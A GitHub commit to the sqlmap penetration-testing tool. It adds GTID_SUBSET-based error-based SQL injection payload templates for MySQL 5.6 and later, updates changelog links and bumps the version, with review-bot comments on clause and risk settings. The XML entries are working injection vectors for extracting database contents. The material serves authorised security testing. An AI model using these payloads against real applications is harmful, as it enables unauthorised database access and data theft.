
Commit 6b7a1df

committed
Adding new payload (credits: blackfan.ru)
1 parent 67f918f commit 6b7a1df


3 files changed

+84
-1
lines changed


data/xml/payloads/error_based.xml

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -91,6 +91,46 @@
9191
</details>
9292
</test>
9393

94+
<test>
95+
<title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
96+
<stype>2</stype>
97+
<level>4</level>
98+
<risk>1</risk>
99+
<clause>1,2,3,8,9</clause>
100+
<where>1</where>
101+
<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
102+
<request>
103+
<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
104+
</request>
105+
<response>
106+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
107+
</response>
108+
<details>
109+
<dbms>MySQL</dbms>
110+
<dbms_version>&gt;= 5.6</dbms_version>
111+
</details>
112+
</test>
113+
114+
<test>
115+
<title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
116+
<stype>2</stype>
117+
<level>4</level>
118+
<risk>3</risk>
119+
<clause>1,8,9</clause>
120+
<where>1</where>
121+
<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
122+
<request>
123+
<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
124+
</request>
125+
<response>
126+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
127+
</response>
128+
<details>
129+
<dbms>MySQL</dbms>
130+
<dbms_version>&gt;= 5.6</dbms_version>
131+
</details>
132+
</test>
133+
94134
<test>
95135
<title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
96136
<stype>2</stype>
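Review bot: the two new tests at lines 94-133 sit ahead of the JSON_KEYS entries that start at line 134 and carry the same `<level>4</level>`, but their `<dbms_version>&gt;= 5.6</dbms_version>` range is a superset of the `&gt;= 5.7.8` range the JSON_KEYS titles declare, so on a 5.7.8+ server both variants will be tried for the same clause; a short XML comment stating that GTID_SUBSET is the fallback for 5.6.x servers that lack JSON_KEYS would document the intent, and the same comment should explain the risk split (`<risk>1</risk>` for the AND form, `<risk>3</risk>` for the OR form), since an OR vector in a WHERE clause can change which rows the application's own query affects.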
@@ -886,6 +926,26 @@
886926
</details>
887927
</test>
888928

929+
<test>
930+
<title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
931+
<stype>2</stype>
932+
<level>5</level>
933+
<risk>1</risk>
934+
<clause>1,2,3,9</clause>
935+
<where>3</where>
936+
<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
937+
<request>
938+
<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
939+
</request>
940+
<response>
941+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
942+
</response>
943+
<details>
944+
<dbms>MySQL</dbms>
945+
<dbms_version>&gt;= 5.6</dbms_version>
946+
</details>
947+
</test>
948+
889949
<test>
890950
<title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
891951
<stype>2</stype>
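Review bot: `<clause>1,2,3,9</clause>` at line 934 omits clause 8, which the AND variant of the same payload (line 99, `<clause>1,2,3,8,9</clause>`) includes; if the parameter-replace form is meant to match the JSON_KEYS parameter-replace entry that follows, say so in a comment, otherwise align the two lists so both GTID_SUBSET entries are exercised in the same clauses.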
@@ -1155,6 +1215,26 @@
11551215
</details>
11561216
</test>
11571217

1218+
<test>
1219+
<title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
1220+
<stype>2</stype>
1221+
<level>5</level>
1222+
<risk>1</risk>
1223+
<clause>2,3</clause>
1224+
<where>1</where>
1225+
<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
1226+
<request>
1227+
<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
1228+
</request>
1229+
<response>
1230+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1231+
</response>
1232+
<details>
1233+
<dbms>MySQL</dbms>
1234+
<dbms_version>&gt;= 5.6</dbms_version>
1235+
</details>
1236+
</test>
1237+
11581238
<test>
11591239
<title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
11601240
<stype>2</stype>
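Review bot: the leading comma in `<vector>` and `<payload>` (lines 1225 and 1227) is what makes this form fit an ORDER BY / GROUP BY position, yet the AND entry added in the first hunk already lists clauses 2 and 3 at a lower `<level>`; if this level-5, `<clause>2,3</clause>` entry is the one intended for ORDER BY / GROUP BY, consider whether the AND entry should keep 2 and 3 at all, or add a comment that the overlap deliberately mirrors the JSON_KEYS pair so a later reader does not treat it as a duplication.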

doc/CHANGELOG.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,14 +6,17 @@
66
# Version 1.3 (2019-01-05)
77

88
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
9+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
910

1011
# Version 1.2 (2018-01-08)
1112

1213
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
14+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
1315

1416
# Version 1.1 (2017-04-07)
1517

1618
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
19+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
1720

1821
# Version 1.0 (2016-02-27)
1922

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
from thirdparty.six import unichr as _unichr
1919

2020
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
21-
VERSION = "1.4.7.4"
21+
VERSION = "1.4.7.5"
2222
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2323
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2424
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
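Review bot: the bump from `1.4.7.4` to `1.4.7.5` follows the `<major>.<minor>.<month>.<monthly commit>` scheme in the comment on line 20, and because the last component is non-zero `TYPE` evaluates to "dev", so the line itself is fine; what is missing is any record of the new GTID_SUBSET tests in doc/CHANGELOG.md (this commit only adds milestone links there), so a changelog line for the payloads would make the version bump traceable.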
